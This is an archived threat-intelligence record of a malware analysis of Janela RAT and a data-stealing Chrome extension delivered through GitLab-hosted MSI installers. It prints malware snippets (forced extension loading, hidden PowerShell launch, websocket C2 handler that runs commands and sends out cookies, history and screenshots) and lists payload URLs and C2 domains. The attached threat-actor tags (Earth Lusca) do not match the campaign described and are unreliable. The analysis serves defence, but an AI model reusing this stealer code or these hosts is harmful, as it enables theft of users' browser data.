{
	"id": "ab85c6e3-5b21-47dc-b4e6-a3ff10007555",
	"created_at": "2026-04-06T01:31:42.058962Z",
	"updated_at": "2026-04-10T03:36:48.08473Z",
	"deleted_at": null,
	"sha1_hash": "4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c",
	"title": "Janela RAT and a stealer extension delivered together",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 918879,
	"plain_text": "Janela RAT and a stealer extension delivered together\r\nBy Jason Reaves\r\nPublished: 2025-07-01 · Archived: 2026-04-06 01:28:14 UTC\r\nJanela RAT appears to be a version or variant of BX RAT according to existing reporting, and was also mentioned targeting LATAM by ZScaler[3]. While doing some recent investigations into campaigns we stumbled on a campaign ending in the delivery of Janela along with a browser extension designed for stealing data, utilizing multiple files from various GitLab accounts.\r\nMSI deliveries from GitLab accounts:\r\nhttps://gitlab.com/mariogadu896/a5da3e9493a2b6993af982874c4a53f5/-/raw/main/_61b10e601b06.msi\r\ninstaller:\r\n907cff1b76b2e2e44fa6bb41e6b0502733592fee7c18bb9873b9ae2b88bf941c\r\nInside the installer is a number of files:\r\n Date Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:46 ....A 8623 F_bbdbce168f31\r\n2025-06-12 20:58:46 ....A 1578248 F_3bdda10aab90\r\n2025-06-12 20:58:46 ....A 109 F_e69ef3b45260\r\n2025-06-12 20:58:46 ....A 715 F_dfb49ddcd9b6\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:46 1587695 1622016 4 files\r\nThe files include a zip file and a number of scripts:\r\nF_3bdda10aab90: Zip archive data, at least v2.0 to extract, compression method=deflate\r\nF_bbdbce168f31: Unicode text, UTF-8 text, with CRLF line terminators\r\nF_dfb49ddcd9b6: DOS batch file text, ASCII text, with CRLF line terminators\r\nF_e69ef3b45260: DOS batch file text, ASCII text, with CRLF line terminators\r\nSome of the scripts depend on other stages of the execution flow having completed: for example, the script that sets up the custom browser extension waits for the extension to be put in place, but that happens later and is done by a different executable entirely.\r\n$extensionPath = \"C:\\Users\\Public\\Documents\\LPrKz6y2fG\\3a5OxUe6\"\r\n$maxTries = 10\r\n$try = 0\r\nwhile ($try -lt $maxTries) {\r\n if (Test-Path $extensionPath) {\r\n Start-Sleep -Seconds 10\r\n break\r\n } else {\r\n Start-Sleep -Seconds 10\r\n $try++\r\n }\r\n}\r\nUltimately it looks for Chromium-based browsers and adds parameters to their launch command so that the extension is loaded:\r\n\"--load-extension=`\"$extensionPath`\" --disable-extensions-except=`\"$extensionPath`\" -no-first-run\"\r\nOne of the other scripts contains functionality for unzipping a zip file and building a PowerShell script to detonate a hardcoded EXE name:\r\necho $process = Start-Process -FilePath \"LPrKz6y2fG.exe\" -WorkingDirectory \"%DEST_DIR%\" -PassThru \u003e\r\necho $process.WaitForExit() \u003e\u003e \"%TEMP%\\start_process.ps1\"\r\nstart \"\" powershell -WindowStyle Hidden -Command \"\u0026 '%TEMP%\\start_process.ps1'; Remove-Item '%TEMP%\\s\r\nInside the zip file:\r\n Date Time Attr Size Compressed Name\r\n2025-06-12 20:58:44 ..... 229 172 com.yourcompany.monitoringapp.json\r\n2025-06-12 20:58:44 ..... 2855936 1193307 LPrKz6y2fG.exe\r\n2025-06-12 20:58:44 ..... 384840 384022 LPrKz6y2fG.zip\r\n2025-06-12 20:58:44 ..... 256 261 LPrKz6y2fG.zip.sig\r\nThe exe, ‘LPrKz6y2fG.exe’, is a GoLang binary that has the password to the same-named zip file inside of it.\r\nInside that zip file is a browser extension and a Janela RAT executable:\r\n Date Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:44 ..... 294792 156139 BF32FB64-1EF9-4ABF-8806-8B182B7929D4.exe\r\n2025-06-12 20:58:44 ..... 256 289 BF32FB64-1EF9-4ABF-8806-8B182B7929D4.exe.sig\r\n2016-07-08 12:47:08 ..... 192000 81431 protobuf-net.dll\r\n2025-06-12 20:58:44 ..... 256 289 protobuf-net.dll.sig\r\n2020-02-19 07:05:18 ..... 20856 11440 System.Buffers.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Buffers.dll.sig\r\n2022-05-08 00:31:02 ..... 142240 59835 System.Memory.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Memory.dll.sig\r\n2018-05-15 10:29:44 ..... 115856 32896 System.Numerics.Vectors.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Numerics.Vectors.dll.sig\r\n2020-02-19 07:05:16 ..... 16768 8916 System.Runtime.CompilerServices.Unsafe.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Runtime.CompilerServices.Unsafe.dll.sig\r\n2025-06-12 20:58:38 ..... 83868 28990 3a5OxUe6/bg_d94f45fa.js\r\n2025-06-12 20:58:38 ..... 614 386 3a5OxUe6/ct_cb4f5a58.js\r\n2025-06-12 20:58:38 ..... 1299 757 3a5OxUe6/manifest.json\r\n------------------- ----- ------------ ------------ ------------------------\r\nThe RAT exe name is also referenced in the GoLang binary in relation to a number of base64 encoded URLs.\r\nDecoded URLs:\r\nhttps://gitlab.com/mario1950ams341/rootkit_1206/-/raw/main/file1.csv\r\nhttps://gitlab.com/mario1950ams34\r\nInside these files is a base64 encoded C2 domain:\r\n% curl -k https://gitlab.com/mario1950ams341/rootkit_1206/-/raw/main/file1.csv |base64\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 44 100 44 0 0 65 0\r\nhxxps://w51w.worldassitencia[.]com\r\nAfter processing the URLs it will also attempt to generate a config.json file, which is used by later stages.\r\nThis is interesting because the browser extension contained in the previously unzipped zip file references the same config.json file:\r\n async loadConfig() {\r\n let e = await fetch(chrome.runtime.getURL(\"config.json\"));\r\n if (!e.ok) throw new Error(\"Failed loading config.json\");\r\n return await e.json()\r\n }\r\nCommands issued from the C2 websocket all go to a single function:\r\n }), this.socket.on(\"connect\",\r\n () =\u003e this.onConnected()),\r\n this.socket.on(\"disconnect\",\r\n () =\u003e this.onDisconnected()),\r\n this.socket.on(\"connect_error\",\r\n o =\u003e this.onError(o)),\r\n this.socket.on(\"command\",\r\n o =\u003e this.handleCommand(o)), n = !0;\r\nExtension command handler:\r\nhandleCommand(e) {\r\n switch (e.action) {\r\n case \"screenshot\":\r\n this.captureScreenshot();\r\n break;\r\n case \"execute\":\r\n this.executeNative(e.command);\r\n break;\r\n case \"refresh\":\r\n this.collectReresh();\r\n break;\r\n case \"version\":\r\n this.executeVersion(e);\r\n break\r\n }\r\n }\r\nScreenshot takes a screenshot of at most 800x600 and sends it off:\r\n maxWidth: e = 800,\r\n maxHeight: t = 600\r\nExecuteNative uses the chrome.runtime API, specifically chrome.runtime.sendNativeMessage, to pass the command to an EXE (the native messaging host) that executes it. The callback function handles sending off the results:\r\n executeNative(e) {\r\n chrome.runtime.sendNativeMessage(\"com.yourcompany.monitoringapp\", {\r\n Command: e,\r\n Type: \"command\"\r\n }, t =\u003e {\r\n if (chrome.runtime.lastError) {\r\n this.sendData(\"native_response\", {\r\n type: \"response\",\r\n response: \"[**EERRORRR**]\" + chrome.runtime.lastError.message\r\n });\r\n return\r\n }\r\n this.sendData(\"native_response\", {\r\n type: \"response\",\r\n response: t\r\n })\r\n })\r\n }\r\ncollectReresh collects the system info along with cookies, browsing history (max 100 results), installed extensions and a listing of open tabs:\r\n async collectReresh() {\r\n this.collectedData.systemInfo = await this.getSystemInfo(), this.collectedData.browse\r\n cookies: await this.getAllCookies(),\r\n history: await this.getBrowserHistory(),\r\n extensions: await this.getInstalledExtensions()\r\n }, this.collectedData.currentState = {\r\n tabs: await this.getOpenTabs()\r\n }, this.sendData(\"ext_response\", {\r\n type: \"refresh\",\r\n payload: this.collectedData\r\n }), chrome.storage.local.set({\r\n lastDataCollection: new Date().toISOString()\r\n })\r\n }\r\nExecuteVersion loads a value into a variable that was initialised as an array:\r\n vr = []\r\n executeVersion(e) {\r\n vr = e.data\r\n }\r\nThis data, expected to be a list of strings, is later used to check whether any of those strings is present in a tab's URL:\r\n function Ds(r) {\r\n try {\r\n return vr.some(e =\u003e r.includes(e))\r\n } catch {\r\n return !1\r\n }\r\n }\r\nThe config generated by the binary also appears to contain the repo list. This is used to obtain the C2 endpoint for communications, in this case over websocket:\r\n let e = this.config,\r\n t = e.repos,\r\n n = !1;\r\n for (let s of t) try {\r\nlet i = await Ls.get(s);\r\n this.socket = he(atob(i.data), {\r\n transports: [\"websocket\"],\r\n reconnection: !1,\r\n query: {\r\n clientId: e.clientId,\r\n tipo: \"extensao\",\r\n username: e.username,\r\n computername: e.computername,\r\n version: ft\r\n }\r\nThe Janela RAT[3] binary itself is obfuscated with the free version of Eziriz .NET Reactor[1]; a deobfuscator for the free version still exists[2].\r\nThe key for decoding strings is the same as the one mentioned in the ZScaler blog:\r\npublic class Settings\r\n{\r\n public static string PASSWORD = Convert.ToString(8521);\r\n public static string VERSION = \"2.2\";\r\nIOCs\r\nNetwork\r\nteam000analytics.safepurelink.com\r\nw51w.worldassitencia.com\r\nbulder.wordsuporttsk.com\r\nda6b97b245c65193eb231de0314508759a69db35a8f76afc66b4757702a231d0\r\n248ee6233a85daaa3ddc2d9aaf6f24a26969a1f46981aa2a13af0c661fe006d8\r\nVBA related files\r\n666ba2708be3fc6a208d1e961af343a8105959fa87bfd3322a36d6c4e57d1122\r\n6ed7ec9d0c366310d647f44830a6b9bc353a0d8b9e3345253c770bb23a90bdd3\r\n97364179ab942af483b973653b89c0dfb8ed5c7d56ed62dbbf7a62933c473fa6\r\ne2a86247b7089a5ffb4d0a3c421cedc044c744d37852ebac17291855c54713cf\r\ne200158dcca9b28c65d297cc2ff44a2183d8228568c2ebf98ac888d494e18649\r\nDisk:\r\n%TEMP%\\start_process.ps1\r\nC:\\Users\\Public\\Documents\\LPrKz6y2fG\\3a5OxUe6\r\nGit accounts:\r\nhttps://gitlab.com/eduardolucenciosbizera/\r\nhttps://gitlab.com/mariogadu896/\r\nhttps://gitlab.com/bnewcbvgeral\r\nhttps://gitlab.com/gitlabworkingg/\r\nReferences\r\n1: https://www.eziriz.com/dotnet_reactor.htm\r\n2: https://0x1.gitlab.io/reverse-engineering/NETReactorSlayer/\r\n3: https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech\r\nSource: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8"
	],
	"report_names": [
		"janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439102,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.pdf",
		"text": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.txt",
		"img": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.jpg"
	}
}